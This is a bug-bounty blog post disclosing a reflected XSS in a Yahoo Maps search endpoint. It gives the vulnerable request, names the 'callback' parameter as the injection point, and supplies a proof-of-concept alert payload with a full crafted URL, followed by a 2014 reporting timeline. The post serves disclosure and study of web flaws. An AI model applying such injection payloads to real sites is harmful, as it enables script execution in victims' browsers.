Self reflected XSS in maps.yahoo.com

This bug was valid for 24 days. Later, it turned up that it’s a duplicate (#@&!).

After typing some text into the search box (i.e. “New York, NY”) and clicking the “Search Maps” button there is a GET request to gws2.maps.yahoo.com:

GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1

callback” parameter is vulnerable to JavaScript injection, for example by using the following payload:

alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

You can see the effect by visiting the following link:

http://gws2.maps.yahoo.com/onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));

This content will be then executed in maps.yahoo.com

XSS is exploitable only by visiting maps.yahoo.com and modifying the request to gws2.maps.yahoo.com (or another website, which will contain a request to that vulnerable link).

Timeline:

[February 2nd 2014] - bug was reported
[March 5th 2014] - bug was marked as a duplicate

P.S. No screenshots this time, please enjoy the video:

https://www.youtube.com/watch?v=PETcfv68lM0

Leave a Reply

Your email address will not be published. Required fields are marked *